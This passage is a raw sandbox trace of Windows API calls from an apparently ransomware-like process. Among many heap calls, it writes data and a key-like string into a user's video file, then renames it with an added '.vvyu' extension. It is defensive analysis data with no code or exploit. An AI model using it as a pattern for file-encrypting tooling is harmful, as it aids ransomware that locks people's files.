hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeac38 | out: hHeap=0x2c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.473] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x104fd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x104fd, lpOverlapped=0x0) returned 1 [0198.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.475] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10502, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.475] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.477] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.477] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.477] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.477] CloseHandle (hObject=0x584) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0198.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.480] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\L6EhB4OjIlkRcLeaHkH.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\l6ehb4ojilkrcleahkh.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\L6EhB4OjIlkRcLeaHkH.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\l6ehb4ojilkrcleahkh.avi.vvyu")) returned 1 [0198.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.481] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.485] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a7ea0, ftCreationTime.dwHighDateTime=0x1d8a459, ftLastAccessTime.dwLowDateTime=0xf0fe2d20, ftLastAccessTime.dwHighDateTime=0x1d8a6c4, ftLastWriteTime.dwLowDateTime=0xf0fe2d20, ftLastWriteTime.dwHighDateTime=0x1d8a6c4, nFileSizeHigh=0x0, nFileSizeLow=0x10502, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L6EhB4OjIlkRcLeaHkH.avi", cAlternateFileName="L6EHB4~1.AVI")) returned 0 [0198.485] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0198.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0198.485] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.486] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.521] RtlAllocateHeap (HeapHandle=0x2c0000, 